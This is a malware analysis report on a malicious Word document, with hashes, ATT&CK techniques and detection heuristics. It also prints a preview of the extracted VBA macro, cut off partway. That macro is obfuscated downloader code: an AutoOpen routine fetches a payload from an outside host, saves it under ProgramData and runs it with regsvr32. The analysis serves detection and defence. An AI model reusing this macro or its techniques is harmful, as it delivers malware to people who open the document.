Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 ccf950c9869d1bf9…

MALICIOUS

Office (OOXML)

134.2 KB Created: 2020-07-09 00:03:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2020-09-07
MD5: d830dff1af4844d03914d53c388902a6 SHA-1: d67e8ab969d141a527238cd6a369f90b0136d92d SHA-256: ccf950c9869d1bf9882478bb2a8bbf9b65c21eb0e0c8d851c4bdda3232b40c11
142 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample is an OOXML document containing a VBA project with an AutoOpen macro. This macro is configured to execute a shell command, indicating an attempt to download and run a secondary payload. The presence of an external relationship pointing to a local file path suggests a potential obfuscation or staging technique.

Heuristics 5

  • External relationship high OOXML_EXTERNAL_REL
    External target in word/_rels/document.xml.rels: file:///C:\Framework\rels\builds\pack1\it.jpg
  • VBA project inside OOXML medium 2 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas OOXML external relationship
    • http://schemas.microsoft.com/office/drawing/2014/chartexOOXML external relationship
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartexOOXML external relationship
    • http://schemas.microsoft.com/office/drawing/2015/10/21/chartexOOXML external relationship
    • http://schemas.microsoft.com/office/drawing/2016/5/9/chartexOOXML external relationship
    • http://schemas.microsoft.com/office/drawing/2016/5/10/chartexOOXML external relationship
    • http://schemas.microsoft.com/office/drawing/2016/5/11/chartexOOXML external relationship
    • http://schemas.microsoft.com/office/drawing/2016/5/12/chartexOOXML external relationship
    • http://schemas.microsoft.com/office/drawing/2016/5/13/chartexOOXML external relationship
    • http://schemas.microsoft.com/office/drawing/2016/5/14/chartexOOXML external relationship
    • http://schemas.openxmlformats.org/markup-compatibility/2006OOXML external relationship
    • http://schemas.microsoft.com/office/drawing/2016/inkOOXML external relationship
    • http://schemas.microsoft.com/office/drawing/2017/model3dOOXML external relationship
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsOOXML external relationship
    • http://schemas.openxmlformats.org/officeDocument/2006/mathOOXML external relationship
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingOOXML external relationship
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingOOXML external relationship
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainOOXML external relationship
    • http://schemas.microsoft.com/office/word/2010/wordmlOOXML external relationship
    • http://schemas.microsoft.com/office/word/2012/wordmlOOXML external relationship
    • http://schemas.microsoft.com/office/word/2018/wordml/cexOOXML external relationship
    • http://schemas.microsoft.com/office/word/2016/wordml/cidOOXML external relationship
    • http://schemas.microsoft.com/office/word/2018/wordmlOOXML external relationship
    • http://schemas.microsoft.com/office/word/2015/wordml/symexOOXML external relationship
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupOOXML external relationship
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkOOXML external relationship
    • http://schemas.microsoft.com/office/word/2006/wordmlOOXML external relationship
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeOOXML external relationship

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 4534 bytes
SHA-256: e5bca83cb392162a053e894890c6e430a4e7d1c9f2ef56aa7cd6bb79a9204c71
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "ec326802"
Function fe4ec286()
fe4ec286 = ActiveWindow.Index
End Function
Function bbae29b5()
bbae29b5 = ActiveWindow.WindowState
End Function
Function bbea0591()
bbea0591 = ActiveWindow.WindowState
End Function
Function f0a0a2c3()
f0a0a2c3 = Application.ActiveDocument.AutoFormatOverride
End Function
Sub e3d98885(ec5854be, a2edb26c)
Dim e83efae5
e83efae5 = FreeFile
Open ec5854be For Output As #e83efae5
Print #e83efae5, fb9845ed(a2edb26c)
Close #e83efae5
End Sub
Function e5a58b37()
e5a58b37 = ActiveWindow.Width
End Function
Function d714ca6d()
d714ca6d = Application.ActiveDocument.ClickAndTypeParagraphStyle
End Function
Function ce1d86c7()
ce1d86c7 = ActiveWindow.StyleAreaWidth
End Function
Function b3f949cd()
b3f949cd = Application.ActiveDocument.ConsecutiveHyphensLimit
End Function
Function ae96cd43(d3317a6f)
a62717da = Len(d3317a6f)
For ac76f592 = 1 To a62717da Step 2
a70d1643 = a70d1643 & Mid(d3317a6f, ac76f592, 1)
Next
ae96cd43 = a70d1643
End Function
Function e4a520db()
e4a520db = 0
End Function
Function a3db36e8()
a3db36e8 = 140
End Function
Function de283e13()
de283e13 = ActiveWindow.DisplayHorizontalScrollBar
End Function
Function c7bf951d()
c7bf951d = 303 + 27
End Function
Sub b0d4efac()
End Sub
Function cb2a1449()
cb2a1449 = ActiveWindow.IMEMode
End Function
Function bd8139b8()
bd8139b8 = ActiveWindow.StyleAreaWidth
End Function
Function e7973407()
e7973407 = 187
End Function
Function f412b4e9()
f412b4e9 = Application.ActiveDocument.Application
End Function
Sub AutoOpen()
Dim dabbfa2a As New c866f7af
e3d98885 ae96cd43("cf:b\0p8r0ocg0rfa2m2d3a4t8ae\42f65758b5b.0j9p6ga"), dabbfa2a.aec585bb(ae96cd43("h0tdtcpd:b/6/2r30frbfdk1.fceoamb/0i9zf5a/fy0a6c1a5.2p5hdp2?8l4=0kbpct481.0c4a8b3"))
Dim a472d4bc As New WshShell
a472d4bc.exec f1af2dc9 & " " & ae96cd43("cf:b\0p8r0ocg0rfa2m2d3a4t8ae\42f65758b5b.0j9p6ga")
End Sub

Attribute VB_Name = "fdb59699"
Function b25192ce()
b25192ce = ActiveWindow.WindowNumber
End Function
Function bc70d712()
bc70d712 = 52214.477127003
End Function
Function cdf5a88d()
cdf5a88d = Application.ActiveDocument.Content
End Function
Function a24b17e8()
a24b17e8 = Application.ActiveDocument.ActiveThemeDisplayName
End Function
Function fb9845ed(ab45e830)
fb9845ed = StrConv(ab45e830, 64)
End Function
Function cb0a04d6()
cb0a04d6 = ActiveWindow.Parent
End Function
Function f37f7f40()
f37f7f40 = Application.ActiveDocument.ChartDataPointTrack
End Function
Function ca87ecc5()
ca87ecc5 = ActiveWindow.DisplayLeftScrollBar
End Function
Function c9154a47()
c9154a47 = -1286666770
End Function
Function ee199523()
End Function
Function e4f544d0()
e4f544d0 = ActiveWindow.WindowState
End Function
Function f0e683a9()
f0e683a9 = "Foreshortening obeys bounteous"
End Function
Function a1ae8a7d()
a1ae8a7d = ActiveWindow.Top
End Function
Function b2c39231()
b2c39231 = ActiveWindow.HorizontalPercentScrolled
End Function
Function f1af2dc9()
f1af2dc9 = ae96cd43("rae8g3sbv1r33029")
End Function

Attribute VB_Name = "c866f7af"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function f14bfb6f()
f14bfb6f = ActiveWindow.HorizontalPercentScrolled
End Function
Function dd7d946c()
dd7d946c = ActiveWindow.DocumentMap
End Function
Function e87a7155()
e87a7155 = ActiveWindow.UsableHeight
End Function
Function adfb537d()
adfb537d = Application.ActiveDocument.ClickAndTypeParagraphStyle
End Function
Function aec585bb(cf8f8776)
Dim dace57d9 As Object
Set dace57d9 = New MSXML2.XMLHTTP30
Call d
... (truncated)
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 28160 bytes
SHA-256: 71e960e5a24eb05a0aba76f9d7b04392c772a2bd94213cc093318c769be8f180

Open this report in the interactive analyzer, or submit your own file for analysis.